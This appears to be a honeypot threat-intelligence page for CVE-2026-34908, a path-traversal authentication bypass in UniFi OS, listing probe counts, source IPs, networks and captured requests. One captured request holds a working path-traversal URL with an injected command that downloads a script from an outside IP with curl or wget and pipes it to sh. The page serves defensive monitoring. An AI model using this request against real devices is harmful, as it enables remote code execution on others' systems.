CVE-2026-34908: UniFi OS - Authentication Bypass via Path Traversal (..%2f)
HoneyLabs honeypots recorded 8 probes matching CVE-2026-34908 from 2 distinct source IP addresses in the last 7 days. Severity is rated critical.
This CVE is on CISA's Known Exploited Vulnerabilities list.
Request paths that identify it
- /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 77.239.124.109 | 7 | Banatsync Srl | The Netherlands |
| 74.0.48.55 | 1 | Layer7 Technologies Inc | The Netherlands |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS198364 | Banatsync Srl | 7 | 1 |
| AS40662 | Layer7 Technologies Inc | 1 | 1 |
Captured requests
- /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+curl+-s+http://95.155.151.113/unifi%7Csh%7C%7Cwget+-qO-+http://95.155.151.113/unifi%7Csh%7C%7Ccurl+-s+ht…
HTTP client fingerprints (JA4H)
- ge11nn0400_17292dadbc7b
CVE report
CVE report
Open a specific CVE from the CVE tracker.